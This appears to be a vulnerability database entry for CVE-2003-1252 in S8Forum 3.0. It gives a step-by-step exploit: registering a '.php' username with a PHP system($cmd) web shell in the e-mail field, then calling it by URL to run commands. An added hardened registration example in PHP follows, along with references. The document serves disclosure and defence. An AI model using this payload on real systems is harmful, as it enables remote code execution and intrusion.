S8Forum Remote Command Execution Vulnerability

Vulnerability ID: 1107149   Vulnerability type: Input validation
Published: 2003-01-06   Updated: 2006-01-17
CVE ID: CVE-2003-1252   CNNVD-ID: CNNVD-200312-375
Platform: PHP   CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/22134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-375
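|Vulnerability details
register.php in S8Forum 3.0 is vulnerable. A remote attacker can execute arbitrary PHP commands by creating a user whose name ends in a .php extension and entering the desired commands in the E-mail field. This creates a web-accessible .php file that the attacker can then call, as demonstrated by using a "system($cmd)" e-mail address with an "any_name.php" username.
|Exploit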
source: http://www.securityfocus.com/bid/6547/info

S8Forum is prone to a remote command execution vulnerability.

When a user registers with the forum, a file is created locally with the specified username. The contents of this file will be the data entered by the user. As a result, a malicious user could create a file with an arbitrary name and PHP (.php) extension that contains valid PHP code. The attacker may then cause this file to be executed by requesting it via HTTP. 

- go to Register

- insert in Username:
any_name.php

- in Password: any_password

- in E-Mail:

<? system($cmd); ?>

Then request the following page:

http://www.example.com/s8forumfolder/users/any_name.php?cmd=uname%20-a
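
A hardened counterpart of the registration step described above, as an added example that is not S8Forum's code or part of the original advisory. The function names and `$dataDir` (assumed to be a directory outside the web root) are assumptions; the sample inputs are constructed from the values shown on this page.

```php
<?php
// Added example: allowlist validation plus server-chosen file names.
// validate_registration(), store_user() and $dataDir are hypothetical names.
function validate_registration(string $username, string $email): array
{
    $errors = [];
    // Allowlist: letters, digits, underscore, hyphen; no dots, slashes or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{3,32}\z/', $username)) {
        $errors[] = 'username';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email';
    }
    return $errors;
}

function store_user(string $dataDir, string $username, string $email, string $password): string
{
    if ($errors = validate_registration($username, $email)) {
        throw new InvalidArgumentException('rejected fields: ' . implode(', ', $errors));
    }
    // The server picks the file name and extension; user input never reaches the path.
    $path = rtrim($dataDir, '/') . '/' . hash('sha256', strtolower($username)) . '.json';
    $record = json_encode([
        'username' => $username,
        'email'    => $email,
        'password' => password_hash($password, PASSWORD_DEFAULT),
    ], JSON_THROW_ON_ERROR);
    // 'x' mode fails if the file exists, so an existing account is never overwritten.
    $fh = @fopen($path, 'x');
    if ($fh === false) {
        throw new RuntimeException('account already exists or directory not writable');
    }
    fwrite($fh, $record);
    fclose($fh);
    chmod($path, 0600);
    return $path;
}

// Constructed demo: a temp dir stands in for a directory outside the web root.
$dir = sys_get_temp_dir() . '/s8demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
try {
    store_user($dir, 'any_name.php', '<? system($cmd); ?>', 'any_password');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
echo basename(store_user($dir, 'alice', 'alice@example.com', 'correct horse')), PHP_EOL;
```

Even with this validation in place, the user data directory should not be served by the web server or have PHP execution enabled, so a stored record can never be requested as a script.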
|References

Source: BID
Name: 6547
Link: http://www.securityfocus.com/bid/6547
Source: BUGTRAQ
Name: 20030105 A security vulnerability in S8Forum
Link: http://www.securityfocus.com/archive/1/305406
Source: XF
Name: s8forum-register-command-execution(10974)
Link: http://www.iss.net/security_center/static/10974.php
Source: VULNWATCH
Name: 20030105 A security vulnerability in S8Forum
Link: http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0004.html
Source: SECTRACK
Name: 1005881
Link: http://www.securitytracker.com/id?1005881
Source: SECUNIA
Name: 7819
Link: http://secunia.com/advisories/7819